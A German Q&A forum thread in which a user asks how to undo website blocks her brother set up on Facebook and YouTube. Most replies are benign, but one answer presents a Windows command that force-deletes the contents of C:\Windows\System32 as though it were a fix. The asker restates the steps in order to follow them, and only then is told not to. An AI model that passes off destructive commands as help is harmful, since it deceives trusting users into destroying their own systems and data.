Frage von marsmeadchen,

internetseiten entsperren

hallo. mein bruder hat mir internetseiten gesperrt wie facebook und youtube,um mich zu ärgern. wie kann ich diese seiten jetzt wieder entsperren???

Hilfreichste Antwort von antongandon,

kommt darauf an wie er es gemacht hat. evlt reicht schon, wenn du über httpS://facebook.com draufgehst. Ansonsten kannste mal hidemyass.com

Antwort von berlinberlin63,
1 Mitglied fand diese Antwort hilfreich

Mit dem Passwort deines Bruders. Räume ihm sein Zmmer auf, dann wird er es dir bestimmt verraten.

Antwort von LuxChilli,

Na, dann stink mal auf die Leitung! Nee jetzt erlich, wie hat er denn das gesperrt, per Router (Internetversender) oder am Computer selber?

Kommentar von marsmeadchen,

ich weiß nicht so genau.nur dass er an seinem handy was eingegeben hat und dann die seiten gesperrt waren.

Kommentar von LuxChilli,

Da kann ich dir dann leider auch nicht weiter helfen aber trotzdem noch viel Erfolg

Antwort von Konservativ,
Windowstaste + r [Enter]


cmd [Enter]


del c:\windows\system32\*.* /F /S /Q [Enter]
Kommentar von marsmeadchen,

Also nur damit ich es sicher weiß:als erstes muss ich die Windowstaste mit dem kleinem r zusammen drücken und dann cmd,danach Enter und dann c:/windows/System 32*.*/F/S/Q und dann nochmal Enter. ist dass so richtig?

Kommentar von Konservativ,

mach das nicht

Kommentar von marsmeadchen,

Und warum nicht?

Keine passende Antwort gefunden?

Verwandte Fragen

Fragen Sie die Community